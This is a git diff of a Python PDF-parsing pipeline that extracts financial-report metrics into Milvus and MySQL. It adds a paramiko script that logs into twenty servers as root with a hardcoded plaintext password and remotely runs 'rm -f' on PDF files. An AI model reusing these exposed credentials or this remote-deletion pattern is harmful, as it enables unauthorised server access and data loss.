record_end = record_range.split('-')[1]
|
||||
|
||||
if str(report_type) == "2":
|
||||
table_index_array = []
|
||||
measure_index_array = []
|
||||
|
||||
client = MilvusClient(
|
||||
uri=MILVUS_CLIENT,
|
||||
)
|
||||
|
@ -370,6 +402,8 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
ori_measure_id = record[3]
|
||||
measure_id = record[4]
|
||||
measure_vector = redis_service.read_from_redis(redis_client,ori_measure_id)
|
||||
|
||||
|
||||
measure_list = ast.literal_eval(measure_vector)
|
||||
data = [measure_list]
|
||||
filter_str = 'file_id == "'+file_id+'"'
|
||||
|
@ -383,10 +417,10 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
filter=filter_str,
|
||||
partition_name=partition_name
|
||||
)
|
||||
|
||||
|
||||
|
||||
# Convert the output to a formatted JSON string
|
||||
# for i in range(len(res[0])):
|
||||
|
||||
for i in range(len(res[0])):
|
||||
|
||||
vector_distance = float(res[0][i]["distance"])
|
||||
|
@ -411,17 +445,18 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
if utils.check_pdf_measure_black_list(pdf_measure):
|
||||
continue
|
||||
if f"{table_num}_{table_index}" in measure_index_array and utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
|
||||
#if utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
|
||||
print(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标')
|
||||
logger.info(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标')
|
||||
continue
|
||||
|
||||
|
||||
|
||||
|
||||
if vector_distance > distance and table_num not in parent_table_pages:
|
||||
#检测规则开始
|
||||
#判断抽取指标和财报指标周期是否相同
|
||||
ori_period = utils.get_period_type(ori_measure_name, report_year)
|
||||
pdf_period = utils.get_period_type(pdf_measure, report_year)
|
||||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
print(f'第1处{ori_period}和{pdf_period}')
|
||||
logger.info(f'第1处{ori_period}和{pdf_period}')
|
||||
if(ori_period != pdf_period):
|
||||
continue
|
||||
|
||||
|
@ -429,7 +464,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
start_ori_period = utils.get_start_period_type(ori_measure_name)
|
||||
start_pdf_period = utils.get_start_period_type(pdf_measure)
|
||||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
print(f'第2处{start_ori_period}和{start_pdf_period}')
|
||||
logger.info(f'第2处{start_ori_period}和{start_pdf_period}')
|
||||
if(start_ori_period != start_pdf_period):
|
||||
continue
|
||||
|
||||
|
@ -437,7 +472,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
ori_season_type = utils.get_season_flag(ori_measure_name)
|
||||
pdf_season_type = utils.get_season_flag(pdf_measure)
|
||||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
print(f'第3处{ori_season_type}和{pdf_season_type}')
|
||||
logger.info(f'第3处{ori_season_type}和{pdf_season_type}')
|
||||
if(ori_season_type != pdf_season_type):
|
||||
continue
|
||||
|
||||
|
@ -445,7 +480,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
ori_kf_type = utils.get_kf_flag(ori_measure_name)
|
||||
pdf_kf_type = utils.get_kf_flag(pdf_measure)
|
||||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
print(f'第4处{ori_kf_type}和{pdf_kf_type}')
|
||||
logger.info(f'第4处{ori_kf_type}和{pdf_kf_type}')
|
||||
if(ori_kf_type != pdf_kf_type):
|
||||
continue
|
||||
|
||||
|
@ -453,7 +488,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
ori_type = utils.get_percent_flag(ori_measure_name)
|
||||
pdf_type = utils.get_percent_flag(pdf_measure)
|
||||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
print(f'第5处{ori_type}和{pdf_type}')
|
||||
logger.info(f'第5处{ori_type}和{pdf_type}')
|
||||
if(ori_type != pdf_type):
|
||||
continue
|
||||
|
||||
|
@ -461,7 +496,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
ori_growth_type = utils.get_percent_growth(ori_measure_name)
|
||||
pdf_growth_type = utils.get_percent_growth(pdf_measure)
|
||||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
print(f'第6处{ori_growth_type}和{pdf_growth_type}')
|
||||
logger.info(f'第6处{ori_growth_type}和{pdf_growth_type}')
|
||||
if(ori_growth_type != pdf_growth_type):
|
||||
continue
|
||||
|
||||
|
@ -526,12 +561,12 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
unit = unit_records[0][0]
|
||||
else:
|
||||
unit = '元'
|
||||
|
||||
|
||||
data_to_insert = (file_id, file_name, "table", int(table_num), int(table_index), ori_measure_id, ori_measure_name, measure_value, create_time, create_time, vector_distance, pdf_measure,measure_id,measure_name,unit)
|
||||
cursor.execute(insert_query, data_to_insert)
|
||||
conn.commit()
|
||||
except Exception as e:
|
||||
print(e)
|
||||
logger.info(e)
|
||||
finally:
|
||||
parent_table_pages = []
|
||||
client.close()
|
||||
|
@ -550,6 +585,10 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
|
|||
SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config
|
||||
where year = '{year}'
|
||||
'''.format(year=report_year)
|
||||
select_query_first_quarter = '''
|
||||
SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_first_quarter
|
||||
where year = '{year}'
|
||||
'''.format(year=report_year)
|
||||
select_query_half_year = '''
|
||||
SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_half_year
|
||||
where year = '{year}'
|
||||
|
@ -574,8 +613,8 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
|
|||
cursor.execute(select_query_half_year)
|
||||
records = cursor.fetchall()
|
||||
end_time = time.time()
|
||||
print(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
print('insert_table_measure_from_vector_async_process方法走的半年报')
|
||||
logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f'insert_table_measure_from_vector_async_process方法走的半年报')
|
||||
start_time = time.time()
|
||||
records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
|
||||
processes = []
|
||||
|
@ -583,13 +622,27 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
|
|||
p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array, partition_name))
|
||||
processes.append(p)
|
||||
p.start()
|
||||
elif report_type == 2:
|
||||
start_time = time.time()
|
||||
cursor.execute(select_query_first_quarter)
|
||||
records = cursor.fetchall()
|
||||
end_time = time.time()
|
||||
logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f'insert_table_measure_from_vector_async_process方法走的一季报')
|
||||
start_time = time.time()
|
||||
records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
|
||||
processes = []
|
||||
for record_range in records_range_parts:
|
||||
p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,partition_name))
|
||||
processes.append(p)
|
||||
p.start()
|
||||
elif report_type == 3:
|
||||
start_time = time.time()
|
||||
cursor.execute(select_query_thrid)
|
||||
records = cursor.fetchall()
|
||||
end_time = time.time()
|
||||
print(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
print('insert_table_measure_from_vector_async_process方法走的三季报')
|
||||
logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f'insert_table_measure_from_vector_async_process方法走的三季报')
|
||||
start_time = time.time()
|
||||
records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
|
||||
processes = []
|
||||
|
@ -603,8 +656,8 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
|
|||
cursor.execute(select_query)
|
||||
records = cursor.fetchall()
|
||||
end_time = time.time()
|
||||
print(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
print('insert_table_measure_from_vector_async_process方法走的全年报')
|
||||
logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f'insert_table_measure_from_vector_async_process方法走的全年报')
|
||||
start_time = time.time()
|
||||
records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
|
||||
processes = []
|
||||
|
@ -613,13 +666,13 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
|
|||
processes.append(p)
|
||||
p.start()
|
||||
|
||||
print('等待所有子任务完成,任务ID:', file_id)
|
||||
logger.info(f'等待所有子任务完成,任务ID:{file_id}' )
|
||||
for p in processes:
|
||||
p.join()
|
||||
print('所有子任务完成,任务ID:', file_id)
|
||||
print('启动指标归一化任务ID:', file_id)
|
||||
logger.info(f'所有子任务完成,任务ID:{file_id}')
|
||||
logger.info(f'启动指标归一化任务ID:{file_id}')
|
||||
end_time = time.time()
|
||||
print(f"向量更新时间 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f"向量更新时间 {(end_time - start_time):.2f} 秒。")
|
||||
|
||||
def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_id,file_name):
|
||||
create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
|
||||
|
@ -646,7 +699,7 @@ def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_
|
|||
cursor.execute(select_query)
|
||||
records = cursor.fetchall()
|
||||
end_time = time.time()
|
||||
print(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
start_time = time.time()
|
||||
|
||||
|
||||
|
@ -708,9 +761,9 @@ def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_
|
|||
cursor.execute(insert_query, data_to_insert)
|
||||
conn.commit()
|
||||
except Exception as e:
|
||||
print(e)
|
||||
logger.info(e)
|
||||
end_time = time.time()
|
||||
print(f"向量更新数据时间 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f"向量更新数据时间 {(end_time - start_time):.2f} 秒。")
|
||||
start_time = time.time()
|
||||
|
||||
|
||||
|
@ -720,6 +773,7 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
|
|||
(file_id, page_num, content)
|
||||
VALUES (%s, %s, %s)
|
||||
'''
|
||||
|
||||
for table in table_info:
|
||||
try:
|
||||
data=[]
|
||||
|
@ -730,6 +784,12 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
|
|||
measure_list = table['measure_list']
|
||||
for measure in measure_list:
|
||||
measure_name = measure['measure_name']
|
||||
|
||||
# 需要跳过的一些指标
|
||||
black_list = ["营业总成本"]
|
||||
if any(black in measure_name for black in black_list):
|
||||
continue
|
||||
|
||||
measure_value = measure['measure_value'].replace("(", "").replace(")", "")
|
||||
measure_name = utils.get_clean_text(measure_name)
|
||||
measure_name = measure_name.replace('2023','2023年').replace('2022','2022年').replace('(','').replace(')','')#这个真绝了,怎么都删不掉
|
||||
|
@ -745,7 +805,9 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
|
|||
measure_name_1 = measure_name.replace('调整后','').replace('上年期末数','上年期末').replace('上年期末','上年年末')
|
||||
measure_unit = measure['measure_unit']
|
||||
if re.match(r'^[+-]?(\d+(\.\d*)?|\.\d+)(%?)$', measure_value) and any(key_word in measure_name for key_word in measure_name_keywords):
|
||||
|
||||
vector_obj = utils.embed_with_str(measure_name_1)
|
||||
|
||||
vector = vector_obj.output["embeddings"][0]["embedding"]
|
||||
measure_data = {}
|
||||
measure_data['vector'] = vector
|
||||
|
@ -773,7 +835,7 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
|
|||
measure_value = match.group(2)
|
||||
if crease_type == '减少' or crease_type == '下降':
|
||||
measure_value = f'-{match.group(2)}'
|
||||
|
||||
|
||||
vector_obj = utils.embed_with_str(measure_name_1)
|
||||
vector = vector_obj.output["embeddings"][0]["embedding"]
|
||||
measure_data = {}
|
||||
|
@ -800,18 +862,18 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
|
|||
data=data,
|
||||
partition_name=partition_name
|
||||
)
|
||||
logger.info(f"向量插入结束")
|
||||
|
||||
except Exception as e:
|
||||
print(e)
|
||||
logger.info(e)
|
||||
|
||||
def runing_job():
|
||||
conn = mysql.connector.connect(
|
||||
host= MYSQL_HOST,
|
||||
user= MYSQL_USER,
|
||||
password= MYSQL_PASSWORD,
|
||||
database= MYSQL_DB
|
||||
host = MYSQL_HOST,
|
||||
user = MYSQL_USER,
|
||||
password = MYSQL_PASSWORD,
|
||||
database = MYSQL_DB
|
||||
)
|
||||
|
||||
# 创建一个cursor对象来执行SQL语句
|
||||
cursor = conn.cursor(buffered=True)
|
||||
select_query = '''
|
||||
|
@ -824,7 +886,7 @@ def runing_job():
|
|||
return False
|
||||
|
||||
def insert_pdf_parse_process(parser_info,conn,cursor):
|
||||
|
||||
|
||||
# 执行SQL语句,插入数据
|
||||
insert_query = '''
|
||||
INSERT INTO pdf_parse_process
|
||||
|
@ -839,7 +901,7 @@ def insert_pdf_parse_process(parser_info,conn,cursor):
|
|||
data_to_insert = (file_id, page_num, page_count, content, type)
|
||||
cursor.execute(insert_query, data_to_insert)
|
||||
conn.commit()
|
||||
|
||||
|
||||
|
||||
def delete_database(conn,cursor,file_id):
|
||||
try:
|
||||
|
@ -856,7 +918,8 @@ def delete_database(conn,cursor,file_id):
|
|||
cursor.execute(truncate,(file_id,))
|
||||
conn.commit()
|
||||
except Exception as e:
|
||||
print(f'删除失败,原因是{e}')
|
||||
logger.info(f'删除失败,原因是{e}')
|
||||
|
||||
def delete_to_run(conn,cursor,file_id):
|
||||
try:
|
||||
truncate_query = [
|
||||
|
@ -875,22 +938,22 @@ def delete_to_run(conn,cursor,file_id):
|
|||
cursor.execute(truncate,(file_id,))
|
||||
conn.commit()
|
||||
except Exception as e:
|
||||
print(f'删除失败,原因是{e}')
|
||||
logger.info(f'删除失败,原因是{e}')
|
||||
|
||||
def insert_pdf_text_info(table_info,conn,cursor):
|
||||
|
||||
# 执行SQL语句,插入数据
|
||||
|
||||
insert_query = '''
|
||||
INSERT INTO pdf_text_info
|
||||
(file_id, page_num, text)
|
||||
VALUES (%s, %s, %s)
|
||||
'''
|
||||
file_id = table_info['file_id']
|
||||
page_num = int(table_info['page_num'])
|
||||
page_num = table_info['page_num']
|
||||
text = table_info['text']
|
||||
data_to_insert = (file_id, page_num, text)
|
||||
cursor.execute(insert_query, data_to_insert)
|
||||
conn.commit()
|
||||
|
||||
|
||||
def process_time(file_id,type,time,start_time,end_time):
|
||||
conn = mysql.connector.connect(
|
||||
|
@ -911,6 +974,7 @@ def process_time(file_id,type,time,start_time,end_time):
|
|||
data_insert = (file_id,type,time,start_time,end_time)
|
||||
cursor.execute(insert_query,data_insert)
|
||||
conn.commit()
|
||||
|
||||
def batch_insert_page_text_nocheck(table_info, conn, cursor):
|
||||
file_id = table_info['file_id']
|
||||
page_num = int(table_info['page_num'])
|
||||
|
@ -923,6 +987,7 @@ def batch_insert_page_text_nocheck(table_info, conn, cursor):
|
|||
data_to_insert = [(file_id, page_num, text) for text in text_lines]
|
||||
cursor.executemany(insert_query, data_to_insert)
|
||||
conn.commit()
|
||||
|
||||
def batch_insert_page_text(table_info, conn, cursor):
|
||||
file_id = table_info['file_id']
|
||||
page_num = int(table_info['page_num'])
|
||||
|
@ -945,6 +1010,7 @@ def batch_insert_page_text(table_info, conn, cursor):
|
|||
else:
|
||||
pass
|
||||
conn.commit()
|
||||
|
||||
def file_type_check(file_id):
|
||||
conn = mysql.connector.connect(
|
||||
host= MYSQL_HOST,
|
||||
|
@ -965,6 +1031,7 @@ def file_type_check(file_id):
|
|||
finally:
|
||||
cursor.close()
|
||||
conn.close()
|
||||
|
||||
def file_type_check_v2(file_id):
|
||||
conn = mysql.connector.connect(
|
||||
host= MYSQL_HOST,
|
||||
|
@ -989,10 +1056,10 @@ def file_type_check_v2(file_id):
|
|||
|
||||
def pdf_title_insert_mysql(file_id,title_array):
|
||||
conn = mysql.connector.connect(
|
||||
host= MYSQL_HOST,
|
||||
user= MYSQL_USER,
|
||||
password= MYSQL_PASSWORD,
|
||||
database= MYSQL_DB
|
||||
host = MYSQL_HOST,
|
||||
user = MYSQL_USER,
|
||||
password = MYSQL_PASSWORD,
|
||||
database = MYSQL_DB
|
||||
)
|
||||
cursor = conn.cursor(buffered=True)
|
||||
for item in title_array:
|
||||
|
@ -1003,13 +1070,12 @@ def pdf_title_insert_mysql(file_id,title_array):
|
|||
cursor.close()
|
||||
conn.close()
|
||||
|
||||
|
||||
def get_file_info_from_mysql(file_id):
|
||||
conn = mysql.connector.connect(
|
||||
host= MYSQL_HOST,
|
||||
user= MYSQL_USER,
|
||||
password= MYSQL_PASSWORD,
|
||||
database= MYSQL_DB
|
||||
host = MYSQL_HOST,
|
||||
user = MYSQL_USER,
|
||||
password = MYSQL_PASSWORD,
|
||||
database = MYSQL_DB
|
||||
)
|
||||
#cursor = conn.cursor(buffered=True)
|
||||
cursor = conn.cursor(dictionary=True)
|
||||
|
|
|
@ -0,0 +1,84 @@
|
|||
#报错提示
|
||||
import paramiko
|
||||
import time
|
||||
import threading
|
||||
|
||||
# 执行命令的函数
|
||||
def execute_commands_on_server(hostname, username, password, host):
|
||||
try:
|
||||
# 连接到服务器
|
||||
client = paramiko.SSHClient()
|
||||
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
client.connect(hostname=hostname, username=username, password=password)
|
||||
|
||||
# 执行命令
|
||||
shell = client.invoke_shell()
|
||||
#启动docker
|
||||
shell.send("cd /root/pdf_parser/pdf\n")
|
||||
time.sleep(1)
|
||||
shell.send("rm -f *.pdf\n")
|
||||
time.sleep(10)
|
||||
shell.send("rm -f *.PDF\n")
|
||||
time.sleep(10)
|
||||
# 读取输出
|
||||
output = shell.recv(2048).decode()
|
||||
print(f"Output from {hostname}:\n{output}")
|
||||
|
||||
except paramiko.SSHException as e:
|
||||
print(f"SSH connection error with {hostname}: {e}")
|
||||
|
||||
finally:
|
||||
client.close()
|
||||
|
||||
# 创建线程函数
|
||||
def thread_function(server):
|
||||
execute_commands_on_server(server['hostname'], server['username'], server['password'], server['host'])
|
||||
|
||||
# 服务器列表
|
||||
# servers = [
|
||||
# {'hostname': 'server1.example.com', 'username': 'user1', 'password': 'pass1', 'host': 'host1'},
|
||||
# {'hostname': 'server2.example.com', 'username': 'user2', 'password': 'pass2', 'host': 'host2'},
|
||||
# # 添加更多服务器
|
||||
# ]
|
||||
servers = [
|
||||
#{'hostname': '124.70.129.232', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'测试服务器'},
|
||||
# {'hostname': '1.94.179.121', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器'},#废弃
|
||||
|
||||
#旧10台
|
||||
{'hostname': '113.44.72.157', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器1'},
|
||||
{'hostname': '1.94.101.237', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器2'},
|
||||
{'hostname': '123.60.16.225', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器3'},
|
||||
{'hostname': '124.71.157.162', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器4'},
|
||||
|
||||
{'hostname': '1.94.60.103', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器5'},
|
||||
{'hostname': '1.94.143.23', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器6'},#都往这里存
|
||||
{'hostname': '124.71.149.225', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器7'},
|
||||
{'hostname': '113.44.52.221', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器8'},
|
||||
{'hostname': '121.37.137.13', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器9'},
|
||||
{'hostname': '123.60.28.83', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器10'},
|
||||
#新10台
|
||||
{'hostname': '192.168.0.19', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器1'},
|
||||
{'hostname': '192.168.0.53', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器2'},
|
||||
{'hostname': '192.168.0.150', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器3'},
|
||||
{'hostname': '192.168.0.210', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器4'},
|
||||
|
||||
{'hostname': '192.168.0.129', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器5'},
|
||||
{'hostname': '192.168.0.24', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器6'},
|
||||
{'hostname': '192.168.0.250', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器7'},
|
||||
{'hostname': '192.168.0.162', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器8'},
|
||||
{'hostname': '192.168.0.86', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器9'},
|
||||
{'hostname': '192.168.0.88', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器10'},
|
||||
]
|
||||
|
||||
# 创建并启动线程
|
||||
threads = []
|
||||
for server in servers:
|
||||
thread = threading.Thread(target=thread_function, args=(server,))
|
||||
threads.append(thread)
|
||||
thread.start()
|
||||
|
||||
# 等待所有线程完成
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
|
||||
print("All commands executed.")
|
|
@ -0,0 +1,246 @@
|
|||
import pandas as pd
|
||||
import mysql.connector
|
||||
import utils
|
||||
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
|
||||
import re
|
||||
import redis
|
||||
|
||||
def process_excel_and_db(input_excel_path1, input_excel_path2, output_file_path):
|
||||
# 读取第一个 Excel 文件
|
||||
df = pd.read_excel(input_excel_path1, sheet_name='Sheet2', header=0)#对应ttt表
|
||||
# 将 DataFrame 转换为字典列表
|
||||
data_list = df.to_dict(orient='records')
|
||||
|
||||
# 连接到 MySQL 数据库
|
||||
conn = mysql.connector.connect(
|
||||
host=MYSQL_HOST,
|
||||
user=MYSQL_USER,
|
||||
password=MYSQL_PASSWORD,
|
||||
database=MYSQL_DB
|
||||
)
|
||||
cursor = conn.cursor()
|
||||
|
||||
# 插入数据到 measure_create_config 表
|
||||
insert_query = '''
|
||||
INSERT INTO measure_create_config
|
||||
(config_id, meta_measure, same_mean_measure, measure_period, change_type, black_list)
|
||||
VALUES (%s, %s, %s, %s, %s, %s)
|
||||
'''
|
||||
for data in data_list:
|
||||
show_measure = str(data['指标'])
|
||||
same_mean_measure = str(data['同义表述'])
|
||||
period_measure = str(data['周期'])
|
||||
change_measure = str(data['变动'])
|
||||
black_list = str(data['黑名单词'])
|
||||
config_id = utils.get_md5(show_measure)
|
||||
insert_query_data = (config_id, show_measure, same_mean_measure, period_measure, change_measure, black_list)
|
||||
cursor.execute(insert_query, insert_query_data)
|
||||
conn.commit()
|
||||
|
||||
# 读取第二个 Excel 文件
|
||||
df_period = pd.read_excel(input_excel_path2, sheet_name='Sheet2', header=0)#对应周期表
|
||||
# 将 DataFrame 转换为字典列表
|
||||
period_list = df_period.to_dict(orient='records')
|
||||
|
||||
# 插入数据到 measure_create_period 表
|
||||
period_insert_query = '''
|
||||
INSERT INTO measure_create_period
|
||||
(period_name, same_mean_period)
|
||||
VALUES (%s, %s)
|
||||
'''
|
||||
for data in period_list:
|
||||
period_name = str(data['标准表述'])
|
||||
same_mean_period = str(data['同义表述'])
|
||||
insert_query_data = (period_name, same_mean_period)
|
||||
cursor.execute(period_insert_query, insert_query_data)
|
||||
conn.commit()
|
||||
|
||||
# 查询数据库
|
||||
data_query = '''
|
||||
SELECT * FROM measure_create_config WHERE delete_status = 0
|
||||
'''
|
||||
period_query = '''
|
||||
SELECT * FROM measure_create_period
|
||||
'''
|
||||
|
||||
cursor.execute(data_query)
|
||||
data_list = cursor.fetchall()
|
||||
|
||||
cursor.execute(period_query)
|
||||
period_list = cursor.fetchall()
|
||||
|
||||
# 输出到文件
|
||||
with open(output_file_path, 'w', encoding='utf-8') as file:
|
||||
for data in data_list:
|
||||
config_id = data[0]
|
||||
show_measure = data[1]
|
||||
same_mean_measure = data[2]
|
||||
period_measure = data[3]
|
||||
change_measure = data[4]
|
||||
same_mean_measure_arr = []
|
||||
period_measure_arr = []
|
||||
change_measure_arr = []
|
||||
|
||||
if same_mean_measure != 'nan':
|
||||
same_mean_measure_arr = same_mean_measure.split(',')
|
||||
same_mean_measure_arr.append(show_measure)
|
||||
if period_measure != 'nan':
|
||||
period_measure_arr = period_measure.split(',')
|
||||
if change_measure != 'nan':
|
||||
change_measure_arr = change_measure.split(',')
|
||||
|
||||
for c in change_measure_arr:
|
||||
period_measure_arr.append(c)
|
||||
|
||||
for x in period_measure_arr:
|
||||
if x in change_measure_arr:
|
||||
show_name = show_measure + x
|
||||
else:
|
||||
show_name = x + show_measure
|
||||
for y in same_mean_measure_arr:
|
||||
if x in change_measure:
|
||||
parser_name = y + x
|
||||
else:
|
||||
parser_name = x + y
|
||||
|
||||
file.write(f'{show_name},{parser_name}\n')
|
||||
|
||||
for p in period_list:
|
||||
period_exra_name = p[0]
|
||||
period_exra_value = p[1]
|
||||
if period_exra_name in x:
|
||||
for v in period_exra_value.split(','):
|
||||
if x in change_measure:
|
||||
parser_name = y + x.replace(period_exra_name, v)
|
||||
else:
|
||||
parser_name = x.replace(period_exra_name, v) + y
|
||||
file.write(f'{show_name},{parser_name}\n')
|
||||
|
||||
cursor.close()
|
||||
conn.close()
|
||||
|
||||
|
||||
# 根据老指标配置表生成新指标配置表
|
||||
def create_new_config(conn, cursor, table_name,old_year,new_year):
|
||||
|
||||
select_query = f'''
|
||||
SELECT measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance,year
|
||||
FROM {table_name}
|
||||
WHERE year = '{old_year}'
|
||||
'''
|
||||
cursor.execute(select_query)
|
||||
data_list = cursor.fetchall()
|
||||
|
||||
insert_query = f'''
|
||||
INSERT INTO {table_name}
|
||||
(measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance, year)
|
||||
VALUES (%s, %s, %s, %s, %s, %s, %s, %s)
|
||||
'''
|
||||
for data in data_list:
|
||||
ori_measure_name = data[3]
|
||||
if re.match(r'^\d{4}',ori_measure_name):
|
||||
year = int(re.match(r'^\d{4}',ori_measure_name).group(0))
|
||||
year += 1
|
||||
ori_measure_name = str(year) + ori_measure_name[4:]
|
||||
insert_data = (data[0],data[1],data[2],ori_measure_name,data[4],data[5],data[6],new_year)
|
||||
cursor.execute(insert_query, insert_data)
|
||||
conn.commit()
|
||||
|
||||
def measure_config_to_db(conn, cursor, table_name):
|
||||
year_list = ["2021","2022","2023","2024","2025"]
|
||||
for year in year_list:
|
||||
insert_query = f'''
|
||||
INSERT INTO {table_name}
|
||||
(measure_id, measure_name, ori_measure_id, ori_measure_name,delete_status,distance,year)
|
||||
VALUES (%s, %s, %s, %s,%s,%s,%s)
|
||||
'''
|
||||
check_query = f'''
|
||||
SELECT ori_measure_id FROM {table_name}
|
||||
WHERE year = '{year}'
|
||||
'''
|
||||
# 新增指标
|
||||
lines = [
|
||||
f"当期营业收入,{year}年第一季度营业收入",
|
||||
f"当期归母净利润,{year}年第一季度归母净利润",
|
||||
f"当期扣非净利润,{year}年第一季度扣非净利润",
|
||||
f"当期经营活动现金流净额,{year}年第一季度经营活动现金流净额",
|
||||
f"当期筹资活动现金流净额,{year}年第一季度筹资活动现金流净额",
|
||||
f"当期投资活动现金流净额,{year}年第一季度投资活动现金流净额",
|
||||
f"当期非经常性损益,{year}年第一季度非经常性损益",
|
||||
f"当期基本每股收益,{year}年第一季度基本每股收益",
|
||||
f"当期稀释每股收益,{year}年第一季度稀释每股收益",
|
||||
f"当期加权平均净资产收益率,{year}年第一季度加权平均净资产收益率",
|
||||
f"当期扣非加权平均净资产收益率,{year}年第一季度扣非加权平均净资产收益率",
|
||||
f"当期营业成本 ,{year}年第一季度营业成本",
|
||||
f"当期销售费用,{year}年第一季度销售费用",
|
||||
f"当期管理费用,{year}年第一季度管理费用",
|
||||
f"当期财务费用,{year}年第一季度财务费用",
|
||||
f"当期研发费用,{year}年第一季度研发费用"]
|
||||
# 打印每一行
|
||||
for line in lines:
|
||||
config_list = line.strip().split(',')
|
||||
measure = config_list[0]
|
||||
ori_measure = config_list[1]
|
||||
ori_measure_id = utils.get_md5(ori_measure)
|
||||
|
||||
# 判断数据库中是否有数据
|
||||
cursor.execute(check_query)
|
||||
check_records = cursor.fetchall()
|
||||
if any(record[0] == ori_measure_id for record in check_records):
|
||||
continue
|
||||
|
||||
data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure,0,0.94,year)
|
||||
cursor.execute(insert_query, data_to_insert)
|
||||
conn.commit()
|
||||
|
||||
def insert_measure_vector(conn,cursor,table_name):
|
||||
from config import REDIS_HOST,REDIS_PASSWORD,REDIS_PORT
|
||||
redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)# 192.168.0.172 #测试123.60.153.169
|
||||
# 执行SQL语句,更新数据
|
||||
select_query = f'''
|
||||
